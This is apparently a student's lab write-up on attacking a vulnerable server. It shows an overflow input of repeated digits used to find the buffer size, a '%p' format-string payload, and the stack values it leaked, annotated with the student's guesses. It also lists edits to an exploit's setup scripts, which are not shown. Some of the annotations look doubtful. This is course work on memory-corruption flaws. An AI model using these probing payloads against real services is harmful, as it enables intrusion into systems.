a Determining the buffer size: 1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234P��� The buffer size seems to be 500. Finding the return address: %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p 0x7ffff7ff81fe0x7ffff7dd8de00xfbad20880x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x7fffffffe4500x7fffffffe6700x4006b2(nil)0x1004005300x7fffffffe6800x4006cb(nil)0x7ffff7a70ead(nil)0x7fffffffe7680x1000000000x4006c2(nil)0xc5584fe82b4455a40x4005300x7fffffffe760(nil)(nil)0x3aa7b017e66455a40x3aa7a0a6379455a40x7fff00000000(nil)(nil)0x4006f00x7fffffffe7680x1(nil)(nil)0x4005300x7fffffffe760(nil)0x4005590x7fffffffe7580x1c0x10x7fffffffe95e(nil)0x7fffffffe97b0x7fffffffe9890x7fffffffe9a50x7fffffffe9b90x7fffffffe9cb0x7fffffffe9d50x7fffffffe9e00x7fffffffe9ee0x7fffffffe9fb0x7fffffffea0f0x7fffffffea1d0x7fffffffea5f0x7fffffffea700x7fffffffef910x7fffffffefb70x7fffffffefc70x7fffffffefd5(nil)0x210x7ffff7ffb0000x100x78bfbff0x60x10000x110x640x30x4000400x40x380x50x80x70x7ffff7ddd0000x8(nil)0x90x4005300xb0xfffe0xc0xfffe0xd0xfffe0xe0xfffe0x17(nil)0x190x7fffffffe9390x1f0x7fffffffefdb0xf0x7fffffffe949(nil)(nil)0xd48cc06ec9bfc1000xd262ac27f415a2b90x34365f3638782a(nil)0x6f2f0000000000000x736e6c75762f74700x6573736f2d7672650x65736e6c75762f630x5f4f4455530076720x303030313d4449470x5f45544f4d4552000x3534313d54534f480x3438312e3631312e0x49414d003139312e0x6d2f7261762f3d4c0x746f6f722f6c69610x474155474e414c000x3a42475f6e653d450x3d52455355006e650x4d4f4800746f6f720x746f6f722f3d450x4449555f4f4455530x4f4c00303030313d0x6f723d454d414e470x3d4d52455400746f0x35322d6d726574780x5500726f6c6f63360x3d454d414e5245530x54415000746f6f720x6c2f7273752f3d480x6962732f6c61636f0x6c2f7273752f3a6e0x6e69622f6c61636f0x62732f7273752f3a0x2f7273752f3a6e690x6962732f3a6e69620x4c006e69622f3a6e0x475f6e653d474e410x382d4654552e420x524f4c4f435f534c0x643a303d73723d530x3a34333b31303d690x36333b31303d6e6c0x703a30303d686d3a0x3a33333b30343d690x35333b31303d6f730x333b31303d6f643a0x3b30343d64623a350x64633a31303b33330x303b33333b30343d0x3b30343d726f3a310x75733a31303b31330x733a31343b37333d0x3a33343b30333d670x31343b30333d61630x343b30333d77743a0x3b34333d776f3a320x37333d74733a32340x303d78653a34343b0x742e2a3a32333b310x31333b31303d72610x303d7a67742e2a3a0x612e2a3a31333b310x31333b31303d6a720x303d7a61742e2a3a0x6c2e2a3a31333b310x31333b31303d687a0x3d616d7a6c2e2a3a0x2e2a3a31333b31300x333b31303d7a6c740x3d7a78742e2a3a310x2e2a3a31333b31300x333b31303d70697a0x31303d7a2e2a3a310x3d5a2e2a3a31333b0x2e2a3a31333b31300x31333b31303d7a640x31303d7a672e2a3a0x7a6c2e2a3a31333b0x2a3a31333b31303d0x333b31303d7a782e0x3d327a622e2a3a310x2e2a3a31333b31300x31333b31303d7a620x303d7a62742e2a3a0x742e2a3a31333b310x333b31303d327a620x303d7a742e2a3a310x642e2a3a31333b310x31333b31303d6265P��� Let's break this up: 0x7ffff7ff81fe 0x7ffff7dd8de0 <-- saved frame pointer *printf 0xfbad2088 <-- return address *printf 0x7025702570257025 <-- buffer ... 0x7025702570257025 0x7fffffffe450 <-- perhaps some local variable, looks like a pointer 0x7fffffffe670 <-- saved frame pointer parent function 0x4006b2 <-- return address parent function (nil) 0x100400530 ... The saved frame pointer of the *printf function is 0x7ffff7dd8de0, so the buffer address is around that, probably a bit lower. b Lucky me, during the SWS course I found a usable exploit on the vulnerable server. Let's use that one. See directory exploit. Changes to the original: * genexploit.sh, 34 changed to 434 (buffer changed from 100 to 500) * genretaddr.sh, return address updated * README, 2266 replaced with 2288 c The server crashed on Tuesday evening, I didn't pursue this any further.